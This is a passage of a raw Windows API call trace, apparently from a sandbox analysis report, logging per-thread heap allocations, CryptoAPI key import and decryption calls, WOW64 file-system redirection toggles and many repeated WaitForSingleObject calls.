[0135.271] CryptSetKeyParam (hKey=0x13273d8, dwParam=0x1, pbData=0x47ff7f0, dwFlags=0x0) returned 1 [0135.271] CryptDecrypt (in: hKey=0x13273d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4f30050, pdwDataLen=0x47ff7bc | out: pbData=0x4f30050, pdwDataLen=0x47ff7bc) returned 1 [0135.271] CryptDestroyKey (hKey=0x13273d8) returned 1 [0135.271] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74440000 [0135.271] GetProcAddress (hModule=0x74440000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x74456b50 [0135.272] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0135.272] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4f30050 | out: hHeap=0x2cb0000) returned 1 [0135.272] SetEvent (hEvent=0x4e8) returned 1 [0135.272] SetEvent (hEvent=0x4e4) returned 1 [0135.272] SetEvent (hEvent=0x4ec) returned 1 [0135.272] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4bcb020 | out: hHeap=0x2cb0000) returned 1 [0135.274] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb48e0 | out: hHeap=0x2cb0000) returned 1 [0135.274] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43b1ad8 | out: hHeap=0x2cb0000) returned 1 [0135.275] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43c1ae0 | out: hHeap=0x2cb0000) returned 1 Thread: id = 85 os_tid = 0xf44 [0134.867] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10000) returned 0x43d1ae8 [0134.867] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10000) returned 0x43e1af0 [0134.868] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x28) returned 0x2cb44c0 [0134.868] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x110102) returned 0x4ceb020 [0134.871] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x50) returned 0x2cb44f0 [0134.871] CryptImportKey (in: hProv=0x12f68a8, pbData=0x493f8c0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x493f928 | out: phKey=0x493f928*=0x13275d8) returned 1 [0134.871] CryptSetKeyParam (hKey=0x13275d8, dwParam=0x1, pbData=0x493f910, dwFlags=0x0) returned 1 [0134.871] CryptDecrypt (in: hKey=0x13275d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb44f0, pdwDataLen=0x493f8dc | out: pbData=0x2cb44f0, pdwDataLen=0x493f8dc) returned 1 [0134.871] CryptDestroyKey (hKey=0x13275d8) returned 1 [0134.871] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74440000 [0134.871] GetProcAddress (hModule=0x74440000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74456b30 [0134.871] Wow64DisableWow64FsRedirection (in: OldValue=0x493f978 | out: OldValue=0x493f978*=0x0) returned 1 [0134.871] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb44f0 | out: hHeap=0x2cb0000) returned 1 [0134.871] WaitForSingleObject (hHandle=0x4e8, dwMilliseconds=0xffffffff) returned 0x0 [0135.266] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x50) returned 0x4f30050 [0135.266] CryptImportKey (in: hProv=0x12f68a8, pbData=0x493f8c0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x493f928 | out: phKey=0x493f928*=0x13272d8) returned 1 [0135.266] CryptSetKeyParam (hKey=0x13272d8, dwParam=0x1, pbData=0x493f910, dwFlags=0x0) returned 1 [0135.266] CryptDecrypt (in: hKey=0x13272d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4f30050, pdwDataLen=0x493f8dc | out: pbData=0x4f30050, pdwDataLen=0x493f8dc) returned 1 [0135.266] CryptDestroyKey (hKey=0x13272d8) returned 1 [0135.266] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74440000 [0135.267] GetProcAddress (hModule=0x74440000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x74456b50 [0135.267] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0135.267] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4f30050 | out: hHeap=0x2cb0000) returned 1 [0135.267] SetEvent (hEvent=0x4e8) returned 1 [0135.267] SetEvent (hEvent=0x4e4) returned 1 [0135.267] SetEvent (hEvent=0x4ec) returned 1 [0135.267] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4ceb020 | out: hHeap=0x2cb0000) returned 1 [0135.269] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb44c0 | out: hHeap=0x2cb0000) returned 1 [0135.269] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43d1ae8 | out: hHeap=0x2cb0000) returned 1 [0135.270] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43e1af0 | out: hHeap=0x2cb0000) returned 1 Thread: id = 86 os_tid = 0xf48 [0134.872] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10000) returned 0x43f1af8 [0134.872] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10000) returned 0x4401b00 [0134.872] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x28) returned 0x2cb44f0 [0134.872] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x110102) returned 0x4e0e020 [0134.876] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x50) returned 0x2cb4520 [0134.876] CryptImportKey (in: hProv=0x12f68a8, pbData=0x4a7fc50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x4a7fcb8 | out: phKey=0x4a7fcb8*=0x13275d8) returned 1 [0134.876] CryptSetKeyParam (hKey=0x13275d8, dwParam=0x1, pbData=0x4a7fca0, dwFlags=0x0) returned 1 [0134.876] CryptDecrypt (in: hKey=0x13275d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb4520, pdwDataLen=0x4a7fc6c | out: pbData=0x2cb4520, pdwDataLen=0x4a7fc6c) returned 1 [0134.876] CryptDestroyKey (hKey=0x13275d8) returned 1 [0134.876] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74440000 [0134.876] GetProcAddress (hModule=0x74440000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74456b30 [0134.876] Wow64DisableWow64FsRedirection (in: OldValue=0x4a7fd08 | out: OldValue=0x4a7fd08*=0x0) returned 1 [0134.876] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4520 | out: hHeap=0x2cb0000) returned 1 [0134.876] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.876] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.876] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.876] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.876] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.877] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.877] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.877] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.877] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.877] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.877] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.877] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.877] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.877] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.877] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.877] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.877] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.877] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.878] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.878] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.878] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.878] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.878] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.878] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.878] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.878] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.878] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.878] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.878] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.878] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.878] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.879] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.879] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.879] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.879] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.879] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.879] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.879] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.879] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.879] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.879] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.879] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.879] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.879] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.880] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.880] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.880] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.880] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.880] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.880] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.880] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.880] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.880] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.880] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.880] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.880] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.880] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.881] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.881] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.881] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.881] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.881] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.881] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.881] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.881] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.881] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.881] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.881] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.881] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.881] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.882] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.882] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.882] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.882] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.882] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.882] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.882] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.882] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.882] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.882] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.882] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.882] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.883] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.883] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.883] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.883] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.883] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.883] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.883] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.883] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.883] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.883] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.883] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.883] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.883] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.884] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.884] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.884] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.884] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.884] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.884] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.884] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.884] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.884] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.884] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.884] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.884] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.884] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.885] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.885] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.885] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.885] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.885] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.885] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.885] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.885] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.885] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.885] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.885] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.885] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.885] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.886] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.886] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.886] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.886] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.886] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.886] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.886] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.886] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.886] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.886] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.886] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.886] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.886] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.887] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.887] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.887] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.887] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.887] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.887] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.887] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.887] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.887] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.887] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.887] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.887] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.888] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.888] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.888] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.888] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.888] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.888] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.888] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.888] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.888] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.888] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.888] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.888] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.888] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.889] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.889] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.889] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.889] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.889] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.889] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.889] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.889] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.890] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.890] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.890] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.890] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.890] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.890] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.890] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.890] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.890] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.890] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.890] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.890] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.890] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.891] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.891] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.891] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.891] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.891] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.891] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.891] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.891] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.891] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.891] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.891] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.891] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.891] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.892] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.892] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.892] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.892] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.892] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.892] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.892] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.892] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.892] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.892] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.892] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.892] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.892] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.893] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.893] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.893] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.893] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.893] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.893] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.893] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.893] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.893] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.893] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.893] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.893] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.893] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.894] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.894] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.894] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.894] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.894] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.894] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.894] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.894] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.894] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.894] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.894] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.894] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.894] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.895] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.895] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.895] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.895] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.895] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.895] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 [0134.895] WaitForSingleObject (hHandle=0x500, dwMilliseconds=0xffffffff) returned 0x0 